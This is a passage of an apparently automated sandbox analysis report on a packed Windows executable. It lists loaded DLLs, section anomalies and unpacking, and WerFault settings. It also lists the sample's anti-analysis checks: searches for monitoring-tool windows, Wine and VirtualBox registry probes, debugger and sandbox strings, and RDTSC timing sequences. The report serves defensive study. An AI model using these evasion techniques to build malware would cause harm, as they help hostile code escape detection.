Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: winrnr.dllJump to behavior
Source: j6Nv9kUydV.exeStatic file information: File size 4495360 > 1048576
Source: j6Nv9kUydV.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284800
Source: j6Nv9kUydV.exeStatic PE information: Raw size of zqcjcxyz is bigger than: 0x100000 < 0x1c1400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeUnpacked PE file: 0.2.j6Nv9kUydV.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zqcjcxyz:EW;eomoelfg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zqcjcxyz:EW;eomoelfg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: j6Nv9kUydV.exeStatic PE information: real checksum: 0x455395 should be: 0x453696
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: .idata
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: zqcjcxyz
Source: j6Nv9kUydV.exeStatic PE information: section name: eomoelfg
Source: j6Nv9kUydV.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeCode function: 0_2_070E0761 push edi; retf 0_2_070E0723
Source: j6Nv9kUydV.exeStatic PE information: section name: zqcjcxyz entropy: 7.95599128870457

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1B17F second address: F1B188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1B2BA second address: F1B2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1B2C0 second address: F1B2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1B2C6 second address: F1B2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1B2CA second address: F1B2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B4h 0x00000007 jc 00007FBCC4EB33A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FBCC4EB33A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E368 second address: F1E36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E36D second address: F1E3E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBCC4EB33A8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007FBCC4EB33B1h 0x0000002d call 00007FBCC4EB33A9h 0x00000032 pushad 0x00000033 jmp 00007FBCC4EB33B7h 0x00000038 push eax 0x00000039 push edx 0x0000003a jng 00007FBCC4EB33A6h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E3E4 second address: F1E3FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBCC4DE8CCEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E3FC second address: F1E401 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E401 second address: F1E441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FBCC4DE8CD5h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007FBCC4DE8CC6h 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FBCC4DE8CCCh 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E59A second address: F1E689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jno 00007FBCC4EB33ACh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FBCC4EB33A8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub ecx, dword ptr [ebp+122D39E6h] 0x00000032 jnc 00007FBCC4EB33ACh 0x00000038 push EFBF15FEh 0x0000003d push ecx 0x0000003e jl 00007FBCC4EB33ACh 0x00000044 pop ecx 0x00000045 add dword ptr [esp], 1040EA82h 0x0000004c jmp 00007FBCC4EB33B9h 0x00000051 push 00000003h 0x00000053 mov dword ptr [ebp+122D26A3h], esi 0x00000059 push 00000000h 0x0000005b mov ecx, ebx 0x0000005d jmp 00007FBCC4EB33B9h 0x00000062 push 00000003h 0x00000064 movsx ecx, ax 0x00000067 call 00007FBCC4EB33A9h 0x0000006c jmp 00007FBCC4EB33AFh 0x00000071 push eax 0x00000072 js 00007FBCC4EB33B7h 0x00000078 jnc 00007FBCC4EB33B1h 0x0000007e jmp 00007FBCC4EB33ABh 0x00000083 mov eax, dword ptr [esp+04h] 0x00000087 pushad 0x00000088 push ebx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E775 second address: F1E7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FBCC4DE8CD5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E7AA second address: F1E7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E7AF second address: F1E7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E7B4 second address: F1E814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FBCC4EB33A8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2661h], ecx 0x0000002a push 00000000h 0x0000002c sbb cl, 00000000h 0x0000002f sbb esi, 78980CEEh 0x00000035 call 00007FBCC4EB33A9h 0x0000003a jmp 00007FBCC4EB33ADh 0x0000003f push eax 0x00000040 jo 00007FBCC4EB33B4h 0x00000046 pushad 0x00000047 jnc 00007FBCC4EB33A6h 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E814 second address: F1E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4DE8CCDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E82D second address: F1E84E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E84E second address: F1E852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E852 second address: F1E873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FBCC4EB33AEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E873 second address: F1E93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a clc 0x0000000b push 00000003h 0x0000000d xor dword ptr [ebp+122D2895h], esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FBCC4DE8CC8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f cld 0x00000030 jbe 00007FBCC4DE8CCCh 0x00000036 sub ecx, dword ptr [ebp+122D3716h] 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FBCC4DE8CC8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov di, dx 0x0000005b mov dword ptr [ebp+122D24C4h], ebx 0x00000061 call 00007FBCC4DE8CC9h 0x00000066 push edx 0x00000067 jmp 00007FBCC4DE8CD6h 0x0000006c pop edx 0x0000006d push eax 0x0000006e jmp 00007FBCC4DE8CD9h 0x00000073 mov eax, dword ptr [esp+04h] 0x00000077 push eax 0x00000078 push edx 0x00000079 jno 00007FBCC4DE8CC8h 0x0000007f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1E93C second address: F1E989 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCC4EB33A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jns 00007FBCC4EB33AEh 0x0000001c pop eax 0x0000001d mov dword ptr [ebp+122D3158h], esi 0x00000023 lea ebx, dword ptr [ebp+12454291h] 0x00000029 sub edx, dword ptr [ebp+122D3896h] 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jc 00007FBCC4EB33B1h 0x00000038 jmp 00007FBCC4EB33ABh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3039D second address: F303A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F303A1 second address: F303AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F1230A second address: F1232C instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CC6h 0x00000008 jmp 00007FBCC4DE8CD4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CE67 second address: F3CE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FBCC4EB33ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CE76 second address: F3CE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CFCA second address: F3CFE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBCC4EB33AAh 0x00000008 jne 00007FBCC4EB33A6h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CFE1 second address: F3CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CFE9 second address: F3CFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jg 00007FBCC4EB33A6h 0x00000012 pop edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3CFFF second address: F3D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3D006 second address: F3D019 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBCC4EB33AEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jl 00007FBCC4EB33A6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3D279 second address: F3D298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FBCC4DE8CD8h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3D298 second address: F3D2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBCC4EB33A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3D2A3 second address: F3D2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FBCC4DE8CC6h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FBCC4DE8CCDh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FBCC4DE8CC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3D2C6 second address: F3D2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3DB5B second address: F3DB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3DB63 second address: F3DB79 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBCC4EB33A6h 0x00000008 jnp 00007FBCC4EB33A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3DB79 second address: F3DB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3DB7D second address: F3DB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3E7FC second address: F3E802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F3E802 second address: F3E80B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
